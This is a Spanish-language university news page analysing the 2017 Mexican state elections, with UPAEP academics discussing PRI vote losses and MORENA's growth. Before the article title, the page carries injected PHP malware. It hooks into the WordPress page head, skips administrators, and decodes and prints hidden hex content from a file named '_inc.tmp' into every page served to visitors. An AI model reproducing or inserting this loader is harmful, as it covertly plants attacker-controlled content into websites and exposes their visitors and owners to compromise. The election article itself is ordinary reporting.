if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } El desprestigio presidencial y escándalos de corrupción han minado al PRI – La Opinión Universitaria La Opinión Universitaria
Menu

El desprestigio presidencial y escándalos de corrupción han minado al PRI

El desprestigio  presidencial  y escándalos de corrupción han minado al PRI analizan en UPAEP

Con base a los resultados que se han obtenido hasta el momento en las elecciones que se realizaron el pasado fin de semana, en los estados de México, Coahuila, Nayarit y Veracruz, ha quedado demostrado que el Partido Revolucionario Institucional (PRI), va a la baja en la preferencia electoral, aseveró el Dr. Alejandro Guillén Reyes, catedrático investigador de la Facultad de Ciencias Políticas de la UPAEP.

El Dr. Guillén Reyes afirmó que asuntos como el desprestigio del presidente de la república y los escándalos de corrupción de los exgobernadores, han metido al PRI en una dinámica de ir a la baja en lo que se refiere a las preferencias electorales. “El partido va a llegar desgastado para las elecciones del 2018, de acuerdo a los datos que tenemos de estas elecciones 2017”.

Señaló que en el caso del PRI y sus resultados en el estado de México, “hasta el momento, se ha señalado que ganó el estado de México con todo lo que representa el aparato de ese estado y el aparato federal y con todos los recursos que se utilizaron para este propósito, el PRI finalmente gana”, pero el dato significativo es que en estos procesos se puede observar cómo este partido ha ido perdiendo votantes en este estado que es su principal bastión.

En ese sentido el Dr. Guillén Reyes refirió que de acuerdo a datos comparativos de las elecciones del 2011 y del 2017, del PREP-IEEM, en las primeras el PRI obtuvo 3 millones 018 mil 588 votos, para el gobernador Eruviel Ávila y en las elecciones de 2017, Alfredo del mazo, registró 1 millón 955 mil 347 votos, lo cual representa una diferencia de un 35.22%, es decir, el PRI, perdió en estas elecciones 1 millón 63 mil 241 votantes en el estado de México.

Indicó que sumado a esto, el margen de victoria del PRI en el 2011 fue de un 41% con todo y su coalición, en esta ocasión fue de sólo un 2.9%, lo que nos habla de una victoria bastante cerrada.

Y en el caso de los demás estados como es el caso de Coahuila, se registra una dinámica similar, en las elecciones de 2011, registró un margen de victoria de un 25.49%, para las elecciones del 2017, hasta el momento, lleva un margen de triunfo de 1.5%, competencia que también fue muy cerrada.

Abundó que en los estados del Norte, los partidos de izquierda no figuran de manera general de acuerdo a los datos históricos que se tienen, en las elecciones 2011 no existía MORENA, y en esa ocasión el PRD registró 11 mil 125 votos (0.95%) para el 2017 MORENA en su aparición en el estado coahuilense, registró un total de 106 mil 201 votos, lo que representó un 12.04%, dato que habla de una presencia significativa de votos.

Dijo que con estos datos, MORENA manifiesta que es uno de los partidos que están mostrando un avance importante en los diferentes estados del país.

En el caso del estado de Nayarit, también el PRI perdió cerca del 50% de los votos en estas elecciones pasadas.

Por lo tanto, señaló que con todos estos datos, el PRI es el partido que más votos perdió en estas elecciones en los estados en donde eligieron gobernadores.

Mientras que el partido de Movimiento Regeneración Nacional (MORENA) con un presupuesto austero se ha posicionado de manera significativa entre el electorado, aun cuando es un partido joven, refirió el académico.

Por su parte, el Dr. Fidencio Aguilar Víquez, también catedrático investigador de la Facultad de Ciencias Políticas de la UPAEP, indicó que MORENA tiene dos elementos básicos en su accionar político, su fuerza electoral y su discurso, y un  tercero, podría ser la estrategia electoral.

Asimismo apuntó el Dr. Aguilar Víquez, en los dos millones 473 mil 116 votos que obtuvo Morena en las elecciones pasadas en los estados de  Coahuila, Nayarit, estado de México y Veracruz, poco menos de las obtenidas por el PRI.

Dijo que con estos resultados. MORENA comprueba su fuerza electoral con 400 mil votos menos debajo del PRI, que en estas elecciones se mantiene como primera fuerza electoral del país con todo y sus caídas estrepitosas que registró en estos momentos.

Advirtió “Morena, sin tanta inversión como lo hizo el PRI, ha logrado una votación relevante, que sin duda le llevará a tener capacidad de maniobra para la elección del año que viene -2018-”.

De igual forma, refirió que MORENA cuenta con un discurso antisistémico, aglutinador que va generando adhesión de electores de diferentes sectores de la sociedad que están inconformes, enojados, molestos, por cómo se han conducido los asuntos públicos en el país y en los diferentes estados.

Y en el caso del estado de Puebla, dijo que MORENA está ganando terreno y podrá echar mano en las próximas elecciones del 2018 en busca de la presidencia de la república.

Con respecto al partido Acción Nacional (PAN), declaró que con estos resultados y datos, tiene una confrontación interna que si no logran arreglarla, seguramente les podrá afectar en los resultados electorales de la elección presidencial. Por lo tanto, dijo que es necesario que aclaren los puntos y evitar fracturas que los debiliten a la hora de definir al candidato que apoyará el partido.

No comments

Deja una respuesta

Tweets recientes